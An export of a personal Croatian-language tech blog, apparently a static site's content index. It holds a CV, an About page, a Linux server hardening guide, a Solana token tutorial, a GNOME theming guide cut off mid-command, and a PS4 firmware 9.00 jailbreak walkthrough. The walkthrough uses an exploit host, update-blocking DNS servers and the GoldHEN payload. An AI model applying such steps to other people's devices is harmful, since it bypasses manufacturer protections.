[{"content":"Luka Piplica # Zadnji put ažurirano 16. listopada 2022 Osnovne informacije # Web stranica Veza E-pošta: lukapiplica@protonmail.ch Web stranica: https://lukapiplica.github.io Github: https://github.com/lukapiplica LinkedIn: https://linkedin.com/in/lukapiplica Stručni sažetak # IT stručnjak orijentiran ka rezultatima s iskustvom u tehničkoj podršci, održavanju računala i administraciji sustava i mreža. Posjeduje vještinu u implementaciji tehnoloških rješenja za poslovne probleme, zajedno sa standardima, procedurama i procesima koji poboljšavaju poslovnu funkcionalnost.\nRadno iskustvo # Radiotelevizija Bosne i Hercegovine (BHRT) # Siječanj 2022 - Rujan 2022 Stručnjak za informatičku podršku, Sarajevo.\nNapravio sam prilagođene Windows instalacije s unaprijed instaliranim klijentskim programima za maksimalnu učinkovitost. Administrirao i nadzirao mrežu tvrtke. Tehnička podška korisnicima za: Microsoft Office, Adobe proizvode, Cinegy i ostali interni programi i sustavi. Održavanje i administracija internet radio veze za RTVFBIH. Postavljanje i konfiguriranje WiFi usmjerivača, L2 i L3 preklopnika i čvorišta te mrežnog kabliranja i označavanja kabela. Nadzor i održavanje print servera i printera. Administracija baze podataka web pošte. Administracija ESET antivirusnog poslužitelja. Uveo i održavao lokalno hostiranog web poslužitelja, FTP, kao i višestruka SMB dijeljenja. Obrazovanje # ITAcademy # 2019-2021 Mrežni administrator, Sarajevo.\nStekao znanje i iskustvo na operativnim sustavima Windows 10, Windows Server 2016, GNU/Linux i nagiOS. Naučio sam kako konfigurirati i postaviti Cisco i MikroTik uređaje na mreži. Naučio Bash, Batch i PowerShell skriptiranje. Stekao sposobnost izrade vrlo detaljnog izvješća o kibernetičkoj sigurnosti, te mjerama za sprječavanje kibernetičkih napada, kao i njihovu implementaciju. Certifikat # Name Credential ID Mrežni administrator 025056 Željeznički školski centar # 2015-2019 Elektrotehničar elektronike, Sarajevo.\nPrve godine sam unaprijedio znanje o različitim elektroničkim dijelovima i usavršio vještine lemljenja. Druga godina, programirao Arduino kontrolirani košarkaški semafor putem HTML web stranice. Treće godine dizajnirao stablo solarnih panela s ugrađenim bluetooth radiom koji može puniti mobilne telefone. Grupni projekt - retro radio s ugrađenim Nixie cijevnim satom. Programirao i sastavio robotsku ruku kojom se upravlja putem Android aplikacije. Stekao sposobnost izrade PCB ploča. Četvrta godina, vodio sam grupu srednjoškolaca i zajedno s njima sudjelovao u osmišljanju i izradi beskonačnog ogledala. Stekao znanje o starim i aktualnim modelima telekomunikacija. Srednjoškolske sekcije # Elektrokemija Osnove elektrotehnike Engleski jezik Matematika Certifikati # Naziv natjecanja Tip Mjesto Željeznički školski centar Osnove Elektrotehnike Školsko Prvo IX Festival Rada Državno Prvo X Festival Rada Državno Prvo XI Festival Rada Državno Prvo Napomena: Ove su potvrde izdane fizički, ja imam digitalnu kopiju; ako ih želite vidjeti slobodno me kontaktirajte putem e-pošte. Volontersko iskustvo # Adair Café Bar # Studeni 2021 - Veljača 2022 Programer web stranice i grafički dizajner\nRazvio sam web stranicu za kafić. Naučio sam mnoge stvari kao što su HTML, CSS i optimizacija web stranice. Osim toga, dok sam programirao web stranicu, stekao sam iskustva s grafičkim dizajnom za izradu novog logotipa, jelovnika i promotivnog plakata. To me dovelo do stjecanja iskustva u programima Adobe Photoshop i Adobe Illustrator.\nVeza: https://adaircafebar.cf Jezici # Ljudski # Jezik Stručnost Engleski Poslovna komunikacija Bosanski/Hrvatski/Srpski Maternji ili dvojezični Njemački Elementarni Strojni # Jezik Markup Python HTML bash/shell Latex CSS Markdown Svi certifikati # Certifikat ID certifikata ITAcademy Certified Computer Network Administrator 025056 Google Digital Garage 325 B49 2XV Udemy Learn to code with Python 3! UC-8aea5973-75b9-45f4-ac48-c2b3542c071e The Complete Python Hacking Course: Begginer to Advanced! UC-b268fbf0-8a81-4575-97a3-75876f56ab12 TryHackMe Complete Begginer Learning Path THM-PV3UWE6H73 TryHackMe CompTIA Pentest+ Learning Path THM-VJ140KARRQ TryHackMe Offensive Pentesting Learning Path THM-EUR7X51H4W TryHackMe Web Fundamentals Learning Path THM-CMQJCBRKFN TryHackMe Advent of Cyber 2020 THM-TVKIPRVSSQ Reference # Slobodno mi pošaljite e-poruku sa svojim interesom za mene, a ja ću vas uputiti na nekoga tko može jamčiti za mene. ","date":"14 listopada 2022","permalink":"/hr/cv/","section":"Curriculum Vitae","summary":"Luka Piplica # Zadnji put ažurirano 16. listopada 2022 Osnovne informacije # Web stranica Veza E-pošta: lukapiplica@protonmail.ch Web stranica: https://lukapiplica.github.io Github: https://github.com/lukapiplica LinkedIn: https://linkedin.com/in/lukapiplica Stručni sažetak # IT stručnjak orijentiran ka rezultatima s iskustvom u tehničkoj podršci, održavanju računala i administraciji sustava i mreža.","title":"Curriculum Vitae"},{"content":"","date":"14 listopada 2022","permalink":"/hr/","section":"Luka Piplica","summary":"","title":"Luka Piplica"},{"content":" 👋 O meni 👋 Kako je sve počelo # Bok, moje ime je Luka. Mladi sam mrežni administrator, a u svoje slobodno vrijeme volim istraživati o svemu što je povezano sa kibernetičkom sigurnošću. Tehnologijom se bavim od malih nogu, a sve je počelo s mojom prvom popravkom računala, neispravna RAM pločica koju sam morao zamijeniti. Nakon toga sam počeo eksperimentisati s elektronikom unutar osobnog računala i nakon nekog vremena stekao sam osnovno znanje o tome kako računala rade.\nStjecao sam sve više znanja kako je vrijeme prolazilo i počeo sam primjenjivati to znanje tako što sam bio IT podrška svojoj obitelji i prijateljima počevši od uputa o korištenju raznih tehnoloških uređaja, zatim sam prešao na instalaciju operativnih sustava i nakon toga sam stekao neko osnovno A+ znanje o računarima.\nSrednja škola # Završio sam Željeznički školski centar sa zvanjem elektrotehničara elektronike. Zahvaljujući brojnim profesorima u ovoj školi stekao sam nova znanja o raznim elektroničkim komponentama, telekomunikacijskim sustavima i sl.\nPrva godina # Tijekom prve godine stekao sam znanja o električnim komponentama (otpornici, kondenzatori, zavojnice itd.) i unaprijedio sam svoje vještine lemljenja. Osvojio sam prvo mjesto na školskom natjecanju iz predmeta osnove elektrotehnike. Također sam pohađao nekoliko sekcija srednje škole uključujući:\nelektrokemija, engleski jezik, osnove elektrotehnike, matematika. Druga godina # Tijekom druge godine sam imao priliku raditi s grupom kolega iz razreda na projektu \u0026ldquo;Arduino Scoreboard\u0026rdquo;, koji nam je donio osvojeno prvo mjesto na državnom natjecanju (IX Festival Rada) u Hadžićima.\nArduino Scoreboard napravljen je pomoću Arduino mikrokontrolera, te WiFi modula koji nas spaja na HTML web stranicu (koju možete vidjeti na laptopu) i pomoću nje kontroliramo brojke i vrijeme na semaforu. Brojevi su ručno izrađeni od LED trake koja se ponaša kao sedmosegmentni zaslon. Treća godina # Tijekom treće godine naučio sam izraditi vlastite PCB-ove, a stekao sam i napredno znanje o tranzistorima. Ove godine za završni projekt imao sam priliku raditi na audio pojačalu.\nKao i prethodne godine, sudjelovali smo na X Festivalu rada koji je održan u Zenici. Kao projekt imali smo solarno stablo koje nam je donijelo prvo mjesto.\nČetvrta godina # Na završnoj godini najviše smo učili o telekomunikacijama, gdje sam za završni rad imao temu o radijskim prijemnicima. Projekt koji smo radili za XI Festival rada je LED stol programiran Arduino mikrokontrolerom za prikaz uzoraka.\nOvaj projekt donio nam je prvo mjesto treću godinu zaredom.\nITAcademy # Nakon završene srednje škole odlučio sam nastaviti svoje poznavanje informacijskih tehnologija na ITAcademy u smjeru mrežne administracije. Konkretno CCNA (Cisco Certified Network Administrator) priprema, gdje sam naučio postaviti i konfigurirati mnoge mrežne uređaje, kao i napredno znanje u korištenju Windows Server i Linux operativnih sustava. Nakon što sam diplomirao na ITAcademy, odlučio sam proširiti svoje dosadašnje znanje u sektoru kibernetičke sigurnosti. Trenutno sam prvi u Bosni i Hercegovini na TryHackMe tabeli.\nMoji hobiji # ⌨️ [Linux OS]\nNapredno poznavanje korištenja Linux operativnih sustava, raznih distribucija te napredno poznavanje terminala i njegovih naredbi. Odlučio sam se za operativni sustav Linux jer volim eksperimentirati s različitim TWM-ovima (Tiling Window Manager). Koristio sam navedene distribucije ispod:\nUbuntu Linux Debian Linux Pop!_OS Kali Linux Parrot OS Arch Linux Artix Linux Manjaro Linux Gentoo Linux 💿 [Elektronika]\nUvijek eksperimentiram s elektronikom, od računala do mobitela, televizora itd.\nAko je nešto pokvareno uvijek pokušam to sam rastaviti i popraviti, a ako nešto ne znam uvijek postoji dobar prijatelj koji se zove Internet. Također sam upoznat s hardverskom i softverskom stranom mnogih elektroničkih uređaja.\n🤖 [Kibernetička sigurnost]\nVećinu slobodnog vremena provodim istražujući i čitajući o novim hakerskim napadima i kako je taj napad izveden.\nAko se radi o zlonamjernom softveru, napravim virtualnu mašinu i instaliram zlonamjernu datoteku, a zatim je analiziram. Što datoteka trenutno radi na sustavu, s kojim drugim datotekama komunicira, što zapisuje u memoriju itd. Upravo je ovo jedan od razloga što sam pokrenuo ovaj blog kako bih mogao dokumentirati ovaj proces.\n📚 [Arduino programiranje]\nMnogi projekti mogu se napraviti na Arduino mikrokontroleru. Arduino nam služi kao mozak elektroničkih komponenti.\nTakođer je odličan za početnike koji žele učiti o elektronici, ali to ne znači da je Arduino namijenjen samo njima. S ovim mikrokontrolerom možemo napraviti mnoge složene projekte.\n🖥️ [Raspberry Pi]\nRaspberry Pi je malo računalo s procesorom, memorijom itd. Otvara puno novih mogućnosti za još složenije projekte od Arduina, kao što su: satelitsko praćenje, arkadni strojevi sa starim igrama, SNES (Super Nintendo) emulator, itd.\n💻 [Stare konzole]\nSkupljam stare igraće konzole i onda na njima radim projekte.\nPrimjer projekta na kojem sam radio je instaliranje Linux OS-a na Nintedno 3DS. Također modificiram konzole kao što je na primjer Xbox 360 s RGH ili JTAG čipom.\n📁 [Aktivist za digitalnu privatnost]\nOdavno je poznato da nas špijuniraju velike kompanije poput Google-a i Facebook-a. Doveli su nas u poziciju da normalnog građanina prate 24 sata. Nažalost, u Bosni i Hercegovini se tema digitalne privatnosti malo pominje. Zašto tvrtke uopće imaju pravo prikupljati podatke o nama?\nVaša privatnost, vaša kontrola nad vašim podacima i vaša sloboda govora na internetu!\nHvala na vašem vremenu 💙 # ","date":"13 listopada 2022","permalink":"/hr/about/","section":"O Meni","summary":"👋 O meni 👋 Kako je sve počelo # Bok, moje ime je Luka. Mladi sam mrežni administrator, a u svoje slobodno vrijeme volim istraživati o svemu što je povezano sa kibernetičkom sigurnošću.","title":"O Meni"},{"content":"","date":"9 listopada 2022","permalink":"/hr/blog/","section":"Blogs","summary":"","title":"Blogs"},{"content":"","date":"9 listopada 2022","permalink":"/hr/categories/","section":"Categories","summary":"","title":"Categories"},{"content":" 🐧 Kako zaštititi Linux poslužitelja ! 🐧 Svi već znaju da biste trebali zaštititi poslužitelja i učiniti ga sigurnijim. Pa, evo nekih osnovnih koraka koje treba poduzeti kako biste zaštitili svoje poslužitelje. Prijeđimo odmah na to:\nKao prvo, toplo bih preporučio korištenje HTTPS protokola za vaš mirror!\nPretpostavit ću da imate svježu instalaciju Linux poslužitelja, imajte na umu da su ove naredbe usmjerene na apt upravitelja paketa, ali bi trebale raditi s drugim upraviteljima paketa uz manje izmjene.\nAžuriranje vašeg poslužitelja # Nakon nove instalacije, prvo što radim je ručno ažurirati poslužitelj:\nsudo apt update sudo apt upgrade Omogućivanje automatskog ažuriranja # Nakon ručnog ažuriranja poslužitelja, obično omogućim automatska ažuriranja.\nImajte na umu da, ovisno o tome koliko je poslužitelj kritičan, možda nećete htjeti da ga ažuriranja pokvare.\nDa biste omogućili automatsko ažuriranje, potreban vam je paket koji se zove unattended-upgrades!\nsudo apt install unattended-upgrades Zatim ga morate omogućiti:\nsudo dpkg-reconfigure --priority=low unattended-upgrades Secure Shell (SSH) # Priprema # Obično se povezivanje s poslužiteljima obavlja daljinski putem preko SSH protokola na zadanom portu 22.\nPrvo ću napraviti novu mapu ako ne postoji u /home direktoriju pod nazivom .ssh.\nmkdir ~/.ssh Zatim ćemo mapi dati dopuštenja od 700, što štiti datoteku od pristupa drugih korisnika dok korisnik koji izdaje i dalje ima puni pristup.\nchmod 700 ~/.ssh Sada se želimo odjaviti s našeg poslužitelja ako smo povezani putem ssh-a.\nlogout Generiranje čvrstog para ključeva Secure Shell-a # Generirajmo sada par javnih i privatnih ključeva kako bismo se mogli sigurno spojiti na poslužitelj. Koristim algoritam ed25519 jer je brz i ne ugrožava sigurnost.\nTakođer bih preporučio korištenje zaporke.\nWindows Powershell: ssh-keygen -t ed25519 Linux Terminal: ssh-keygen -t ed25519 MacOS Terminal: ssh-keygen -t ed25519 Ovo će pohraniti privatne i javne ključeve u vašu home/.ssh mapu, ovisno o vašem OS-u, možda će biti skriveni.\nKopiranje javnog ključa na poslužitelja preko remote-a # Nakon što su javni i privatni ključ generirani, potrebno ih je prenijeti na poslužitelja. Koristit ću SCP za premještanje ključa na poslužitelja.\nWindows Powershell: scp $env:USERPROFILE/.ssh/id_ed25519.pub SERVER_USER@SERVER_IP:~/.ssh/authorized_keys Linux Terminal: ssh-copy-id SERVER_USER@SERVER_IP MacOS Terminal: scp ~/.ssh/id_ed25519.pub SERVER_USER@SERVER_IP:~/.ssh/authorized_keys Daljinski pristup bez lozinke i promjena zadanog porta # Sada moramo zaključati naš ssh i onemogućiti lozinke tako da se možete prijaviti samo s generiranim parovima ključeva. Prijavit ćemo se na našeg poslužitelja i urediti ssh konfiguracijsku datoteku.\nOtvaranje konfiguracijske datoteke:\nsudo nano /etc/ssh/sshd_config Promijenimo zadani port od 22. Odkomentirajte liniju Port, obrišite broj 22 i stavite nešto po svom ukusu.\nKoristite veće brojeve kao što je 4723, na primjer.\nSada u retku AddressFamily možete odrediti želite li koristiti IPv4, IPv6 ili oboje. Onemogućio sam IPv6, ali vi ne morate. Ako odlučite koristiti samo IPv4, zamijenite any s inet\nOnemogućite root prijavu zamjenom PermitRootLogin yes u PermitRootLogin no.\nZatim onemogućite provjeru autentičnosti lozinke zamjenom PasswordAuthentication yes s PasswordAuthentication no\nSada spremite promjene!\nPonovno pokretanje SSH-a za primjenu promjena # Nakon što smo unijeli promjene u konfiguracijsku datoteku, sada moramo ponovno pokrenuti ssh uslugu.\nsudo systemctl restart sshd NAPOMENA: Provjerite imate li vezu tako da se pokušate spojiti s drugog terminala/powershell-a. Ako pogriješite, možete se zaključati! Omogućavanje vatrozida # Najprije provjerite svoje korištene portove tako što ćete:\nsudo ss -tupln Možda koristite druge portove, istražite, ali ja ću omogućiti samo ssh da se mogu spojiti na poslužitelja.\nPrvo, instalirajmo ufw.\nsudo apt install ufw Koristit ću ufw kao svoj firewall. Zapamtite posljednji port koji smo stavili u konfiguracijsku datoteku ssh-a. Moramo to dopustiti. Također, uvijek je preporučljivo navesti koji protokol port koristi, TCP ili UDP!\nsudo ufw allow SSH_PORT/tcp Zatim moramo omogućiti vatrozid.\nsudo ufw enable Kako bismo provjerili koja su pravila dopuštena, možemo koristiti sljedeće:\nsudo ufw status Onemogući ICMP (ping) # Obično je naredba ping korisna mrežnim administratorima i hakerima. Najbolja praksa je onemogućiti ping!\nDa bismo onemogućili ping, moramo urediti ufw konfiguraciju.\nsudo nano /etc/ufw/before.rules Pod odjeljkom pod nazivom ok icmp codes for INPUT, zalijepite ovaj redak tako da bude prvi (odmah ispod ok icmp codes for INPUT).\n-A ufw-before-input -p icmp --icmp-type echo-request -j DROP Ponovno pokrenite poslužitelja:\nsudo reboot now Ping je sada onemogućen!\nZaključak # Poslužitelj koji se ne može hakirati ne postoji! Imajte na umu da je svaki poslužitelj moguće hakirati, ali ovo je dobra praksa koju biste trebali razmisliti o pokušaju da ojačate svog poslužitelja.\nHvala na vašem vremenu 💙 # ","date":"9 listopada 2022","permalink":"/hr/blog/how-to-protect-a-linux-server/","section":"Blogs","summary":"🐧 Kako zaštititi Linux poslužitelja ! 🐧 Svi već znaju da biste trebali zaštititi poslužitelja i učiniti ga sigurnijim. Pa, evo nekih osnovnih koraka koje treba poduzeti kako biste zaštitili svoje poslužitelje.","title":"Kako zaštititi Linux poslužitelja"},{"content":"","date":"9 listopada 2022","permalink":"/hr/categories/linux/","section":"Categories","summary":"","title":"Linux"},{"content":"","date":"21 travnja 2022","permalink":"/hr/categories/consoles/","section":"Categories","summary":"","title":"Consoles"},{"content":" 🎮 PS4 restauracija i 9.00 jailbreak 🎮 Pravno odricanje od odgovornosti: Planiram koristiti ovaj PS4 da instaliram Linux na njega i igram se s njim iz znatiželje. Ne odobravam piratstvo; ovaj članak je samo u obrazovne svrhe! Ne odgovaram za tvoje postupke! Kupio sam rabljenu PS4 Slim konzolu za igranje, a bila je na firmware-u 8.50 i nikada nije bila očišćena iznutra. Prvo što sam učinio je da sam ga otvorio da vidim što je \u0026ldquo;ispod haube\u0026rdquo;. Kad sam ga otvorio, vidio sam prašinu i kad sam ga uključio, PS4 je bio jako glasan. To je značilo da treba zamijeniti termalnu pastu i očistiti ventilatore. Evo slike onoga što je bilo unutra:\nPlanirao sam instalirati Linux na ovaj PS4, ali to zahtijeva Jailbreak i određenu verziju firmvera, i zato sam ga kupio s dovoljno niskom verzijom firmvera da ga mogu nadograditi na 9.00.\nNe možete vratiti firmware na PS4; možete ga samo nadograditi!\nŠto je potrebno:\nFormatiran USB stick Termalna pasta Odvijači Medicinski alkohol Strpljenje Računalo/prijenosno računalo Restauracija: # Prvo sam otvorio PS4, odvrnuo neke vijke i ovako je izgledala unutrašnjost:\nSada koristim alkohol da se riješim stare termalne paste.\nNova termalna pasta koju sam nanio je Arctic MX-4.\nNakon čišćenja ventilatora i hladnjaka rezultat izgleda ovako:\nPuno bolje !\n9.00 Jailbreak # Nakon što sam sklopio PS4 Slim, pokrenuo sam ga bez interneta i vratio na tvorničke postavke ulaskom u Postavke/Inicijalizacija/Inicijalizacija PS4. Ova je opcija izbrisala sve na PS4 što je prethodno bilo uključeno, uključujući igre i račune.\nSada dolazi zabavni dio, jailbreak. Najprije idite na Postavke/Sustav/Automatska preuzimanja i poništite sve okvire.\nNakon toga idite na Postavke/Mreža i poništite okvir koji kaže Povezivanje na internet. Ova opcija sprječava PS4 preuzimanje najnovijeg ažuriranja firmvera.\nSada idite na Postavke/Sustav/Informacije o sustavu i pogledajte svoju verziju firmvera. Imam verziju 8.50, pa moram ručno ažurirati svoj PS4 na 9.00.\nAžuriranje PS4 na 9.00 # Za ažuriranje PS4 na 9.00 trebat će vam USB i računalo. Prvo, morate nabaviti 9.00 firmware. Postoje dvije web stranice, jedna ima brže preuzimanje, ali zahtijeva besplatan račun, a druga ima sporije preuzimanje, ali ne zahtijeva račun. Dark Software (brža preuzimanja, ali zahtijeva račun) Darth Sternie (sporije preuzimanja ali ne zahtijeva račun) Što god odabrali, preuzmite firmware 9.00.\nNakon preuzimanja, dodijelite naziv datoteci PS4UPDATE.PUP\nSada USB formatirajte u exFAT.\nNakon što vaš USB završi formatiranje, idite u korijensku mapu vašeg USB-a i napravite novu mapu pod nazivom PS4, idite u tu mapu i stvorite drugu novu mapu pod nazivom UPDATE, a zatim unutar mape UPDATE, kopirat ćete datoteku PS4UPDATE.PUP. Imajte na umu da mape moraju biti napisane velikim slovima.\nSada izbacite USB disk, prijeđite na PS4 i provjerite svoje obavijesti i obrišite ih!\nPriključite svoj USB disk u PS4 i idite na Postavke/Ažuriranje softvera sustava, što bi trebalo otkriti ažuriranje s vašeg USB-a na 9.00. Slijedite upute na zaslonu i ažurirajte PS4.\nJailbreak PS4 # Nakon što koristite verziju firmvera 9.00, idite na Postavke/Mreža i potvrdite okvir koji smo ranije poništili, Poveži se na Internet.\nSada idite na opciju ispod Postavi internetsku vezu, možete koristiti WiFi ili Ethernet, zatim odaberite Prilagođeno, možete odabrati želite li DHCP ili statičku IP adresu, zatim odaberite Ne specificiraj za DHCP hostname i obavezno odaberite Manual za DNS Postavke!\nKao primarni DNS koristim 192.241.221.79, a kao sekundarni DNS koristim 165.227.83.145! Ovi DNS IP-ovi blokiraju sve veze sa Sonyjevim poslužiteljima kako PS4 ne bi slučajno dobio ažuriranje.\nNakon što je DNS naveden, kliknite dalje i odaberite Automatski za MTU postavke i Ne koristi za proxy poslužitelj.\nSada isključite USB stik iz PS4 koji je imao datoteku ažuriranja 9.00 i ponovno ga uključite u računalo.\nNa računalu ćete morati preuzeti Rufus i exfathax.img s Githuba. Otvorite Rufus, odaberite svoj USB stik, a kao ISO odaberite datoteku exFAThax.img i kliknite Start u Rufusu.\nSada idite na PS4 i prije nego što priključite svoj USB, otvorite web preglednik od PS4 i obavezno obrišite svu povijest i predmemoriju iz njega. Nakon toga možete koristiti host koji vam se sviđa i koji nudi korisna opterećenja.\nLično koristim Karo218 !\nSada, nakon što ste izbrisali svu svoju povijest pregledavanja, kolačiće i podatke, idite na host i kliknite na 9.00 Gold morat ćete pričekati da se exploit sam spremi u predmemoriju za izvanmrežnu upotrebu. Nakon što završi, kliknite na GoldHenV2.2.4, i exploit će vam reći kada da uključite svoj USB.\nPričekajte da payload prikaže GoldHEN obavijest i imate jailbreak-an PS4.\nNAPOMENA: Ako ima bilo kakvih grešaka ili se konzola ruši, ponovno pokrenite PS4 i pokušajte ponovno! Ovaj Jailbreak nije trajan, što znači da nakon gašenja ili ponovnog pokretanja, morate sve učiniti ponovo, jedno od rješenja je da stavite svoj PS4 u način mirovanja ili možete sve učiniti automatskim, ali zahtijeva ESP32-52 ili Raspberry Pi! Konačni rezultat # Zaključak # Ugodan projekt za napraviti, značajno jer je cijena PS4 pala zbog izdanja PS5. Čišćenje PS4 bilo je zadovoljavajuće, a moram reći da je teško otvoriti Slim model. Jailbreak je bio uspješan kao što se i očekivalo, a za mene je radio gotovo 80% vremena, tu i tamo je imao rušenja, ali ponovno pokretanje je to popravilo. Veselim se instalaciji Linuxa na konzolu.\nHvala na vašem vremenu 💙 # ","date":"21 travnja 2022","permalink":"/hr/blog/ps4-restoration-and-jailbreak/","section":"Blogs","summary":"🎮 PS4 restauracija i 9.00 jailbreak 🎮 Pravno odricanje od odgovornosti: Planiram koristiti ovaj PS4 da instaliram Linux na njega i igram se s njim iz znatiželje. Ne odobravam piratstvo; ovaj članak je samo u obrazovne svrhe!","title":"PS4 restauracija i 9.00 Jailbreak"},{"content":"","date":"22 siječnja 2022","permalink":"/hr/categories/cryptocurrency/","section":"Categories","summary":"","title":"Cryptocurrency"},{"content":" 💸 HSKY Token 💸 Što je kripto token? # Danas sve više ljudi koristi kriptovalute; neke poznate su Bitcoin, Dogecoin, Etherium, Solana itd. Sve ove kriptovalute imaju svoj blockchain. Mi izrađujemo kripto token; za razliku od drugih popularnih kriptovaluta s vlastitim blockchain-om, kripto tokeni rade na blockchain-ovima drugih kriptovaluta. Konkretno, koristit ćemo Solanu zbog jeftine naknade prilikom prebacivanja ovog tokena i brzine (Solana ima vrlo brz blockchain, za razliku od ostalih).\nŠto je potrebno: # Operativni sustav: Debian Linux Github profil Github Crypto mjenjačnica Binance Phantom novčanik PhantomWallet Solflare Solflare NAPOMENA: Potrebno je kupiti Solanu! Upute # Moramo stvoriti virtualnu mašinu, a zatim instalirati Debian Linux u CLI (bez grafičkog sučelja).\nNakon instalacije Debian-a, prvo što trebate učiniti je ažurirati sustav.\nAžuriranje Debian-a # sudo apt update sudo apt upgrade Instalacija Solana alata # sh -c \u0026#34;$(curl -sSfL https://release.solana.com/v1.8.5/install)\u0026#34; Zatim upišite exit i ponovno se prijavite u CLI.\nStvaranje kripto novčanika # solana-keygen new Dvaput pritisnite enter i uspješno ste kreirali novčanik.\nNAPOMENA: Javni ključ je zapravo adresa vašeg novčanika, a početnu frazu spremite negdje u slučaju da izgubite novčanik! Kupnja Solane # Da bismo napravili svoj token, moramo kupiti Solanu. Moja preporuka je Binance.\nTransfer Solane: # Nakon što kupimo Solan-u, nalazi se na Binance-u. Moramo ju prenijeti u novčanik na virtualnoj mašini.\nNAPOMENA: Adresa na koju šaljete s Binance-a je javni ključ koji smo napravili u virtualnoj mašini! Nakon što smo uspješno prenijeli Solanu, želimo vidjeti koliko Solana imamo u CLI-u; upisujemo:\nsolana balance Instalacija Rust-a # curl https://sh.rustup.rs -sSf | sh Nakon što kliknete enter, pritisnite 1 za zadanu instalaciju.\nUpišite exit i ponovno se prijavite na virtualnu mašinu.\nInstalacija potrebnih paketa # sudo apt install libudev-dev libssl-dev pkg-config build-essential Instalacija SPL-a # cargo install spl-token-cli Stvaranje kripto tokena # spl-token create-token Stvaranje računa koji će zadržati naš token # spl-token create-account *TOKEN ID* NAPOMENA: Token ID je token koji smo dobili unosom zadnje naredbe! Kovanje žetona i kreiranje broja žetona # spl-token mint *PRVI ID TOKENA* *KOLIČINA* *DRUGI TOKEN ID RAČUNA* Uspješno ste izradili svoj token.\nPrijenos vaših tokena drugima # Da biste prenijeli svoj token drugima, oni prvo moraju napraviti novčanik ili na telefonu ili u web pregledniku. Ako želite napraviti novčanik na telefonu, onda je Solflare odličan novčanik, a ako ćete napraviti novčanik u web pregledniku, predlažem Phantom Wallet.\nspl-token transfer --fund-recipient --allow-unfunded-recipient *PRVI ID TOKENA* *KOLIKO ŽELITE POSLATI* *ADRESA NOVČANIKA NA KOJU ĆEMO SLATI NAŠE TOKENE* Solscan stranica # Solscan stranica: https://solscan.io/ Možemo zalijepiti prvi TOKEN ID na ovu stranicu da provjerimo naš token.\nDodavanje tokena u Solana registar # Najprije izradite sliku za svoj token; mora biti manja od 200kb.\nNapravite Github račun.\nStvorite novi repozitorij i prenesite sliku svog tokena u taj repozitorij (nazovite ga logo.png).\nPosjetite https://github.com/solana-labs/token-list i kliknite na fork. Pritisnite . da otvorite Visual Studio Code u svom web pregledniku. S lijeve strane idite na assets/mainnet desno, kliknite i kreirajte novu mapu i zalijepite adresu tokena.\nKliknite desnom tipkom miša na mapu i kliknite upload, a zatim prenesite sliku svog tokena.\nZatim idite u mapu src s lijeve strane i vidjet ćete mapu tokens, otvorite datoteku solana.tokenlist.json.\nIdite na dno datoteke i dodajte svoj token u JSON formatu; najlakše je kopirati i zalijepiti podatke iz tokena prije vašeg i zatim promijeniti vrijednosti.\nS lijeve strane nalazi se ikona s tri točke; kliknite na njega, zatim dodajte poruku o tome što radite i kliknite na kvačicu.\nZatim se vratite na Solanin GitHub i zatražite zahtjev za povlačenje.\nIzvršite spajanje i pričekajte da proces završi. Solana vrši provjeru svakih sat vremena, tako da vaš zahtjev za povlačenje može biti primljen tek nakon sat vremena.\nFinalni proizvod # Zaključak # Uzbudljiv projekt, može se mnogo naučiti, posebno o kriptovalutama i njihovom funkcioniranju. Trenutno ovaj projekt nema primjenu i nije projekt na kojem možete zaraditi, ali znanje je dovoljno.\nHvala na vašem vremenu 💙 # ","date":"22 siječnja 2022","permalink":"/hr/blog/hsky-token/","section":"Blogs","summary":"💸 HSKY Token 💸 Što je kripto token? # Danas sve više ljudi koristi kriptovalute; neke poznate su Bitcoin, Dogecoin, Etherium, Solana itd. Sve ove kriptovalute imaju svoj blockchain. Mi izrađujemo kripto token; za razliku od drugih popularnih kriptovaluta s vlastitim blockchain-om, kripto tokeni rade na blockchain-ovima drugih kriptovaluta.","title":"HSKY Token"},{"content":" 💻 GNOME ide NORD konfiguracijske datoteke 💻 Ovo su moje trenutne dot datoteke Ubuntu Linuxa.\nInstalacija će vam pomoći da stvorite isti izgled kao na slikama; ovdje su upute korak po korak.\nSpecifikacije sustava:\nOS: Ubuntu Tema GTK-a: Nordic Tema ikona: Flatery_Dark Tema kursora: Oreo_Blue Preglednik: Firefox Instalacija # Pretpostavljam da ste svježe instalirali Ubuntu 20.04 s minimalnom instalacijom kako biste počeli stvarati ovaj izgled.\nAko vas zanima što aplikacija radi, Wikipedia će vam pomoći.\nNadogradnja repozitorija i nadogradnja sustava # sudo apt update sudo apt upgrade Instalacija Gnome alata za podešavanje # Prvo moramo instalirati gnome alat za podešavanje kako bismo instalirali gnome ekstenzije.\nInstalacija alata za podešavanje: sudo apt install gnome-shell-extensions Zatim otvorite Firefox i idite na LINK i preuzmite dodatak.\nPreuzmite potrebne dodatke:\nNakon preuzimanja dodatka Gnome Extension, moramo pomaknuti klizač na Uključeno za nekoliko dodataka; možete ih pronaći na poveznicama ispod:\nDash to Panel User Themes Transparent Window Moving Zatim provjerite jesu li uključeni u operativnom sustavu tako što ćete otvoriti aplikaciju Gnome Tweak Tool i provjeriti jesu li gore navedeni dodaci uključeni; također isključite ikone na radnoj površini.\nNAPOMENA: Možete postaviti Dash to Panel u postavkama kako želite (da ikone budu manje itd.). Također, Transparent Window move moje postavke su na 0.2. Instalacija Pop Shell-a # sudo apt install git node-typescript make Nakon instaliranja potrebnih paketa, moramo otići u mapu Downloads.\ncd ~/Downloads Zatim moramo klonirati repozitoriju:\ngit clone https://github.com/pop-os/shell.git Zatim ulazimo u shell mapu:\ncd shell Instalacija Pop Shell-a:\nmake local-install Instalacija drugih aplikacija # Instalacija neofetch-a: sudo apt install neofetch Instalacija zathura-e: sudo apt install zathura Instalacija tty-clock-a: sudo apt install tty-clock Instalacija cmatrix-a: sudo apt install cmatrix Instalacija htop-a: sudo apt install htop Instalacija ranger-a: sudo apt install ranger Instalacija Vim-a: sudo apt install vim Instalacija Lollypop-a: sudo apt install lollypop Instalacija cbonsai-a: cd ~/Downloads sudo apt install libncursesw5-dev git clone https://gitlab.com/jallbrit/cbonsai cd cbonsai make install PREFIX=~/.local Instalacija tty-tetris-a: cd ~/Downloads sudo apt install cmake git clone https://github.com/Holixus/tty-tetris-v2.git cmake . make sudo make install Instalacija Cava-e: Prvo instaliramo potrebne pakete:\nsudo apt install libfftw3-dev libasound2-dev libncursesw5-dev libpulse-dev libtool automake libiniparser-dev export CPPFLAGS=-I/usr/include/iniparser Zatim idemo u mapu Downloads i kloniramo Cava repozitorij:\ncd ~/Downloads git clone 